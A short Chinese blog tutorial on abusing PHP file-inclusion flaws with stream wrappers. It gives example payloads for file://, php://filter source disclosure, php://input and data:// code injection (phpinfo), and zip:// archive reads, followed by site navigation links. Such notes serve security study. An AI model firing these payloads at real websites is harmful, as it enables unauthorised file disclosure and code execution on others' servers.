技术栈

文件包含漏洞PHP伪协议利用方法

嘤嘤奶嘴酱2024-09-04 8:03

使用file协议读取Windows的系统文件

使用php://filter协议可以将php代码进行base64编码后显示出来

php://input

抓包,并加上<?php phpinfo() ?>

data://

?cmd=data:text/plain,<?php%20phpinfo();?>

zip://

读取压缩包内的⽂件

?cmd=zip://d:/3.zip/3.txt

上一篇:Datawhale X 李宏毅苹果书 AI夏令营-深度学习进阶task3:批量归一化
下一篇:Spring Boot 入门
相关推荐
两个人的幸福
11 天前
Windows 桌面应用自研 PHP 队列(下):完整代码与六大工程化优化
php
BingoGo
13 天前
PHP 泛型之殇 泛型 RFC 提案被拒绝
后端·php
JaguarJack
13 天前
PHP 泛型之殇 泛型 RFC 提案被拒绝
后端·php
用户307459698207
13 天前
PHP 扩展——从入门到理解
php
鹏仔先生
14 天前
拷贝漫画APP下载页PHP程序,后台带免费AI写作
php
LDR006
14 天前
Type-C 快充全面升级!LDR6601 赋能个人护理便携电机,重塑剃须刀 / 理发器新体验
c语言·开发语言
雪碧聊技术
14 天前
Tree.js是什么?一文讲透
开发语言·javascript·ecmascript
码云数智-园园
14 天前
C++20 Modules 模块详解
java·开发语言·spring
swordbob
14 天前
NIO的channel中什么是 fd(File Descriptor,文件描述符)
java·开发语言·nio
源分享
14 天前
Java线程同步的多种实现方法(非常详细)
java·开发语言·jvm
热门推荐
012026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf022026年6月AI大模型全景报告:GPT-5.6、Claude Opus 4.8、Gemini 3.5,中美AI三足鼎立谁主沉浮?032026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?04GitHub 镜像站点05Trae国际版与国内版深度测评:AI原生IDE的双生花06【AI】2026 年具身智能模型和世界模型总结07飞书长连接_事件订阅(接收消息,审批任务状态变更)08Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析092026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?102026年AI架构实战:彻底解决OpenAI接口超时与封号,Python调用GPT-5.2/Sora2企业级架构详解(附源码+压测报告)